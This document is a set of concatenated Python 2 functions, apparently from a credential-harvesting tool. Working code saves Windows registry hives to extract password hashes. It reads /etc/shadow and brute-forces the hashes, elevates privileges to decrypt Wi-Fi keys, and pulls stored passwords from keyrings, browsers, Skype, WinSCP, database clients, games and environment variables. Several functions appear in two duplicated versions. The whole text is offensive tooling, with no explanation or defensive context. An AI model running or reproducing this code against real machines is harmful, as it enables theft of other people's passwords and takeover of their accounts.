def run(self): # Need admin privileges if not windll.Shell32.IsUserAnAdmin(): if logging.getLogger().isEnabledFor(logging.INFO) == True: Header().title('Windows Secrets') print_debug('WARNING', '[!] This script should be run as admin!') return # print the title Header().title('Windows Secrets') # if hives already exists if self.check_existing_systemFiles(): self.delete_existing_systemFiles() # delete it # save system hives for f in self.sysFile: subprocess.Popen('reg.exe save hklm\%s %s.save' % (f,f) , shell=True, stdout=subprocess.PIPE).stdout.read() if not self.check_existing_systemFiles(): print_debug('WARNING', 'Remove existing hive files and launch it again.') return retrieve_hash(self.address, '%s.save' % self.sysFile[2], '%s.save' % self.sysFile[1], '%s.save' % self.sysFile[0], self.ntds, self.history) # remove hives files self.delete_existing_systemFiles()
def run(self): # Need admin privileges if not windll.Shell32.IsUserAnAdmin(): if logging.getLogger().isEnabledFor(logging.INFO) == True: Header().title('Windows Secrets') print_debug('WARNING', '[!] This script should be run as admin!') return # print the title Header().title('Windows Secrets') # if hives already exists if self.check_existing_systemFiles(): self.delete_existing_systemFiles() # delete it # save system hives for f in self.sysFile: try: subprocess.Popen('reg.exe save hklm\%s %s.save' % (f, f), shell=True, stdout=subprocess.PIPE).stdout.read() except Exception, e: print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', 'Failed to save %s hive' % f) return
def retrieve_password(self): # print the title Header().title_debug('Wifi (from Network Manager)') directory = '/etc/NetworkManager/system-connections' if os.path.exists(directory): if os.getuid() != 0: print_debug('INFO', 'You need more privileges (run it with sudo)\n') wireless_ssid = [ f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))] pwdFound = [] for w in wireless_ssid: cp = RawConfigParser() cp.read(os.path.join(directory, w)) values = {} values['SSID'] = w if cp.sections(): for section in cp.sections(): if 'wireless' in section: for i in cp.items(section): values[i[0]] = i[1] # write credentials into a text file if len(values) != 0: pwdFound.append(values) # print the results print_output('Wifi', pwdFound) else: print_debug('ERROR', 'the path "%s" does not exist' %(directory))
def retrieve_password(self): # print title Header().title_debug('SQL Developer') mainPath = self.get_mainPath() if mainPath == 'Error': print_debug('ERROR', 'The APPDATA environment variable is not definded.') elif mainPath == 'SQL_NOT_EXISTS': print_debug('INFO', 'SQL Developer not installed.') elif mainPath == 'SQL_NO_PASSWD': print_debug('INFO', 'No passwords found.') else: passphrase = self.get_passphrase(mainPath) if passphrase == 'Not_Found': print_debug( 'ERROR', 'The passphrase used to encrypt has not been found.') elif passphrase == 'xml_Not_Found': print_debug( 'ERROR', 'The xml file containing the passphrase has not been found.' ) else: salt = self.get_salt() self.get_infos(mainPath, passphrase, salt)
def run(self): # print the title Header().title_info('Opera') # retrieve opera folder path = self.get_path() if not path: print_debug('INFO', 'Opera not installed.') return passwords = '' # check the use of master password if not os.path.exists(path + os.sep + 'operaprefs.ini'): print_debug( 'INFO', 'The preference file operaprefs.ini has not been found.') else: if self.masterPasswordUsed(path) == '0': print_debug('INFO', 'No master password defined.') elif self.masterPasswordUsed(path) == '1': print_debug('WARNING', 'A master password is used.') else: print_debug( 'WARNING', 'An error occurs, the use of master password is not sure.') print passwords = self.decipher_old_version(path) if passwords: self.parse_results(passwords) else: print_debug('INFO', 'The wand.dat seems to be empty')
def run(self): Header().title_info('System account (from /etc/shadow)') # check root access if self.root_access(): if self.check_file_access(): shadowFile = open (self.filestr,'r') for line in shadowFile.readlines(): _hash = line.replace('\n', '') line = _hash.split(':') # check if a password is defined if not line[1] in [ 'x', '*','!' ]: user = line[0] cryptPwd = line[1] # save each hash non empty self.hash += _hash + '\n' # try dictionary and bruteforce attack self.attack(user, cryptPwd) values = {'Category' : 'Hash', 'Hash' : self.hash } self.pwdFound.append(values) # print the results print_output('System account (from /etc/shadow)', self.pwdFound)
def print_output(software_name, pwdFound): if pwdFound: # if the debug logging level is not apply => print the title if logging.getLogger().isEnabledFor(logging.DEBUG) == False: Header().title_info(software_name) toWrite = [] for pwd in pwdFound: lower_list = [s.lower() for s in pwd.keys()] password = [s for s in lower_list if "password" in s] key = [s for s in lower_list if "key" in s] # for the wifi # No password found if not password and not key: print_debug("FAILED", "Password not found !!!") else: print_debug("OK", "Password found !!!") toWrite.append(pwd) constant.nbPasswordFound += 1 for p in pwd.keys(): logging.info("%s: %s" % (p, pwd[p])) print # write credentials into a text file checks_write(toWrite, software_name) else: logging.debug("[!] No passwords found\n")
def hashes_to_dic(self, title, format, content): Header().title1(title) print_debug('INFO', 'Format: (%s)' % format) items = sorted(content) pwdFound = [] values = {} all_hash = '\r\n' for item in items: hash = content[item] (uid, rid, lmhash, nthash) = hash.split(':')[:4] self.wordlist.append(uid.encode("utf8")) all_hash = '%s\r\n%s' % (all_hash, hash) password = self.bruteForce_Hash(nthash) # if a password has been found from the dictionary attack if password: accounts = {} accounts['Category'] = 'System account' accounts['user'] = uid accounts['password'] = password pwdFound.append(accounts) values['hashes'] = all_hash pwdFound.append(values) return pwdFound
def retrieve_password(self): # print title Header().title_debug('Wifi') if not windll.Shell32.IsUserAnAdmin(): print_debug('ERROR', '[!] This script should be run as admin!') return else: if 'ALLUSERSPROFILE' in os.environ: directory = os.environ[ 'ALLUSERSPROFILE'] + os.sep + 'Microsoft\Wlansvc\Profiles\Interfaces' else: print_debug( 'ERROR', 'Environment variable (ALLUSERSPROFILE) has not been found.' ) return if not os.path.exists(directory): print_debug( 'INFO', 'No credentials found.\nFile containing passwords not found:\n%s' % directory) return try: print_debug('INFO', '[!] Trying to elevate our privilege') get_system_priv() print_debug( 'INFO', '[!] Elevation ok - Passwords decryption is in progress') except: print_debug( 'ERROR', '[!] An error occurs during the privilege elevation process. Wifi passwords have not been decrypted' ) time.sleep(5) # read temp file containing all passwords found pwdFound = [] filepath = tempfile.gettempdir() + os.sep + 'TEMP123A.txt' if os.path.exists(filepath): cp = RawConfigParser() cp.read(filepath) for section in cp.sections(): values = {} for c in cp.items(section): values[str(c[0])] = str(c[1]) pwdFound.append(values) # remove file on the temporary directory os.remove(filepath) # print the results print_output("Wifi", pwdFound) else: print_debug('INFO', 'No passwords found')
def run(self): # print title Header().title_info('Dot Net Passport') a = self.get_creds() pwd = '' pwdFound = [] if a: for i in a: values = {} if i['Type'] == win32cred.CRED_TYPE_DOMAIN_VISIBLE_PASSWORD: cipher_text = i['CredentialBlob'] pwd = self.Win32CryptUnprotectData(cipher_text, self.get_entropy()) if pwd != 'failed': values['TargetName'] = i['TargetName'] if i['UserName'] is not None: values['Username'] = i['UserName'] try: values['Password'] = pwd.decode('utf16') except Exception,e: print_debug('DEBUG', '{0}'.format(e)) values['INFO'] = 'Error decoding the password' pwdFound.append(values) # print the results print_output('Dot Net Passport', pwdFound)
def run(self): # print the title Header().title_debug('SQL Developer') mainPath = self.get_mainPath() if mainPath == 'SQL_NOT_EXISTS': print_debug('INFO', 'SQL Developer not installed.') elif mainPath == 'SQL_NO_PASSWD': print_debug('INFO', 'No passwords found.') else: passphrase = self.get_passphrase(mainPath) if passphrase == 'Not_Found': print_debug( 'WARNING', 'The passphrase used to encrypt has not been found.') elif passphrase == 'xml_Not_Found': print_debug( 'WARNING', 'The xml file containing the passphrase has not been found.' ) else: salt = self.get_salt() self.get_infos(mainPath, passphrase, salt)
def run(self): # print title Header().title_info('Kalypso Media Launcher') creds = [] key = 'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89' if 'APPDATA' in os.environ: inifile = os.environ['APPDATA'] + '\\Kalypso Media\\Launcher\\launcher.ini' else: print_debug('ERROR', 'The APPDATA environment variable is not defined.') return # The actual user details are stored in *.userdata files if not os.path.exists(inifile): print_debug('INFO', 'The Kalypso Media Launcher doesn\'t appear to be installed.') return config = ConfigParser.ConfigParser() config.read(inifile) values = {} values['Login'] = config.get('styx user','login') # get the encoded password cookedpw = base64.b64decode(config.get('styx user','password')); values['Password'] = self.xorstring(cookedpw, key) creds.append(values) print_output("Kalypso Media Launcher", creds)
def run(self): # print the title Header().title_debug('Gnome keyring') if os.getuid() == 0: print_debug('INFO', 'Do not run with root privileges)\n') return try: import gnomekeyring if len(gnomekeyring.list_keyring_names_sync()) > 0: pwdFound = [] for keyring in gnomekeyring.list_keyring_names_sync(): for id in gnomekeyring.list_item_ids_sync(keyring): values = {} item = gnomekeyring.item_get_info_sync(keyring, id) attr = gnomekeyring.item_get_attributes_sync( keyring, id) if attr: if item.get_display_name(): values["Item"] = item.get_display_name() if attr.has_key('server'): values["Server"] = attr['server'] if attr.has_key('protocol'): values["Protocol"] = attr['protocol'] if attr.has_key('unique'): values["Unique"] = attr['unique'] if attr.has_key('domain'): values["Domain"] = attr['domain'] if attr.has_key('origin_url'): values["Origin_url"] = attr['origin_url'] if attr.has_key('username_value'): values["Username"] = attr['username_value'] if attr.has_key('user'): values["Username"] = attr['user'] if item.get_secret(): values["Password"] = item.get_secret() # write credentials into a text file if len(values) != 0: pwdFound.append(values) # print the results print_output('Gnome keyring', pwdFound) else: print_debug('WARNING', 'The Gnome Keyring wallet is empty') except Exception, e: print_debug( 'ERROR', 'An error occurs with the Gnome Keyring wallet: {0}'.format(e))
def retrieve_password(self): # print title Header().title_debug('FTP Navigator') path = "C:\\FTP Navigator\\Ftplist.txt" if os.path.exists(path): self.read_file(path) else: print_debug('INFO', 'Paht %s does not exist.\nFTP Navigator not installed or not found.' % path)
def run(self): # print the title Header().title_info('Jitsi') file_properties = self.get_path() if file_properties == 'JITSI_NOT_EXISTS': print_debug('INFO', 'Jitsi not installed.') else: self.get_info(file_properties)
def run(self): # print title Header().title_info('Puttycm') try: database_path = self.get_default_database() except Exception, e: print_debug('DEBUG', '{0}'.format(e)) print_debug('INFO', 'Puttycm not installed') return
def run(self, historic=''): # print title Header().title_info('Internet Explorer') # write the binary file try: self.write_binary_file() except Exception, e: print_debug('DEBUG', '{0}'.format(e)) print_debug( 'ERROR', '%s cannot be created, check your file permission' % dll_name)
def run(self): # print title Header().title_info('Skype') if 'APPDATA' in os.environ: directory = os.environ['APPDATA'] + '\Skype' if os.path.exists(directory): # retrieve the key used to build the salt key = self.get_regkey() if key == 'failed': print_debug('ERROR', 'The salt has not been retrieved') else: pwdFound = [] for d in os.listdir(directory): if os.path.exists(directory + os.sep + d + os.sep + 'config.xml'): values = {} try: values['username'] = d # get encrypted hash from the config file enc_hex = self.get_hash_credential( directory + os.sep + d + os.sep + 'config.xml') if enc_hex == 'failed': print_debug( 'WARNING', 'No credential stored on the config.xml file.' ) else: # decrypt the hash to get the md5 to brue force values['hash_md5'] = self.get_md5_hash( enc_hex, key) values['shema to bruteforce'] = values[ 'username'] + '\\nskyper\\n<password>' # Try a dictionary attack on the hash password = self.dictionary_attack( values['username'], values['hash_md5']) if password: values['password'] = password pwdFound.append(values) except Exception, e: print_debug('DEBUG', '{0}'.format(e)) # print the results print_output("Skype", pwdFound) else: print_debug('INFO', 'Skype not installed.')
def run(self): # print title Header().title_debug('WinSCP') if self.check_winscp_installed(): if not self.check_masterPassword(): r = self.get_logins_info() if r == False: print_debug('INFO', 'WinSCP not installed.') else: print_debug('WARNING', 'A master password is used. Passwords cannot been retrieved') else: print_debug('INFO', 'WinSCP not installed.')
def run(self): Header().title_info('Wifi (from WPA Supplicant)') if self.check_file_access(): return # check root access if os.getuid() != 0: print_debug('INFO', 'You need more privileges (run it with sudo)\n') return pwdFound = self.parse_file() print_output("wpa_supplicant", pwdFound)
def run(self): # print title Header().title_info('Cyberduck') path = self.get_path() if path == 'CYBERDUCK_NOT_EXISTS': print_debug('INFO', 'Cyberduck not installed.') elif path == 'User_profil_not_found': print_debug('INFO', 'User profil has not been found.') elif path == 'APPDATA_NOT_FOUND': print_debug('ERROR', 'The APPDATA environment variable is not defined.') else: self.parse_xml(path)
def run(self): # print the title Header().title_debug('DbVisualizer') mainPath = self.get_mainPath() if mainPath == 'DBVIS_NOT_EXISTS': print_debug('INFO', 'DbVisualizer not installed.') else: passphrase = self.get_passphrase() salt = self.get_salt() self.get_infos(mainPath, passphrase, salt)
def run(self): # print title Header().title_info('Jitsi') file_properties = self.get_path() if file_properties == 'Error': print_debug('ERROR', 'The APPDATA environment variable is not defined') elif file_properties == 'JITSI_NOT_EXISTS': print_debug('INFO', 'Jitsi not installed.') else: self.get_info(file_properties)
def retrieve_password(self): # print title Header().title_debug('Skype') if 'APPDATA' in os.environ: directory = os.environ['APPDATA'] + '\Skype' if os.path.exists(directory): # retrieve the key used to build the salt key = self.get_regkey() if key == 'failed': print_debug('ERROR', 'The salt has not been retrieved') else: pwdFound = [] for d in os.listdir(directory): if os.path.exists(directory + os.sep + d + os.sep + 'config.xml'): values = {} try: values['Username'] = d # get encrypted hash from the config file enc_hex = self.get_hash_credential( directory + os.sep + d + os.sep + 'config.xml') if enc_hex == 'failed': print_debug( 'WARNING', 'No credential stored on the config.xml file.' ) else: # decrypt the hash to get the md5 to brue force values['Hash_md5'] = self.get_md5_hash( enc_hex, key) values['shema to bruteforce'] = values[ 'Username'] + '\\nskyper\\n<password>' pwdFound.append(values) except: pass # print the results print_output("Skype", pwdFound) else: print_debug('INFO', 'Skype not installed.') else: print_debug('ERROR', 'The APPDATA environment variable is not defined.')
def retrieve_password(self): # print title Header().title_debug('Puttycm') try: database_path = self.get_default_database() except: print_debug('INFO', 'Puttycm not installed') return if os.path.exists(database_path): self.parse_xml(database_path) else: print_debug('ERROR', 'Default database does not exist: %s' % database_path)
def run(self): # print title Header().title_info('FTP Navigator') if 'HOMEDRIVE' in os.environ: path = os.environ.get( 'HOMEDRIVE') + os.sep + 'FTP Navigator\\Ftplist.txt' if os.path.exists(path): self.read_file(path) else: print_debug( 'INFO', 'Paht %s does not exist.\nFTP Navigator not installed or not found.' % path)
def retrieve_password(self): # print title Header().title_debug('Squirrel') path = self.get_path() if path == 'Not_Found': print_debug('INFO', 'Squirrel not installed') elif path == 'var_Env_Not_Found': print_debug('ERROR', 'The HOMEPATH environment variable is not definded.') else: path += os.sep + 'SQLAliases23.xml' if os.path.exists(path): self.parse_xml(path) else: print_debug('ERROR', 'xml fil SQLAliases23.xml containing passwords has not be found')
def retrieve_password(self): # print the title Header().title_debug('Squirrel') path = self.get_path() if path == 'Not_Found': print_debug('INFO', 'Squirrel not installed') else: path += os.sep + 'SQLAliases23.xml' if os.path.exists(path): self.parse_xml(path) else: print_debug('WARNING', 'xml file containing passwords has not be found')
def retrieve_password(self): values = {} pwdFound = [] # print the title Header().title_debug('Environnement variables') # --------- http_proxy -------- tmp = '' if 'http_proxy' in os.environ: tmp = 'http_proxy' elif 'HTTP_Proxy' in os.environ: tmp = 'HTTP_Proxy' if tmp: values["Variable"] = tmp values["Password"] = os.environ[tmp] pwdFound.append(values) # --------- https_proxy -------- tmp = '' if 'https_proxy' in os.environ: tmp = 'https_proxy' elif 'HTTPS_Proxy' in os.environ: tmp = 'HTTPS_Proxy' if tmp: values["Variable"] = tmp values["Password"] = os.environ[tmp] pwdFound.append(values) tab = ['passwd', 'pwd', 'pass', 'password'] for i in os.environ: for t in tab: if (t.upper() in i.upper()) and (i.upper() != 'PWD') and ( i.upper() != 'OLDPWD'): values["Variable"] = i values["Password"] = os.environ[i] pwdFound.append(values) # write credentials into a text file if len(values) != 0: # print the results print_output('Environnement variables', pwdFound) else: print_debug('INFO', 'No passwords stored in the environment variables.')
def run(self): # print title Header().title_info('Galcon Fusion') creds = [] # Find the location of steam - to make it easier we're going to use a try block # 'cos I'm lazy try: with OpenKey(HKEY_CURRENT_USER, 'Software\Valve\Steam') as key: results=QueryValueEx(key, 'SteamPath') except: print_debug('INFO', 'Steam does not appear to be installed.') return if not results: print_debug('INFO', 'Steam does not appear to be installed.') return steampath=results[0] userdata = steampath + '\\userdata' # Check that we have a userdata directory if not os.path.exists(userdata): print_debug('ERROR', 'Steam doesn\'t have a userdata directory.') return # Now look for Galcon Fusion in every user files = os.listdir(userdata) for file in files: filepath = userdata + '\\' + file + '\\44200\\remote\\galcon.cfg' if not os.path.exists(filepath): continue # If we're here we should have a Galcon Fusion file with open(filepath, mode='rb') as cfgfile: # We've found a config file, now extract the creds data = cfgfile.read() values = {} values['Login'] = data[4:0x23] values['Password'] = data[0x24:0x43] creds.append(values) print_output("Galcon Fusion", creds)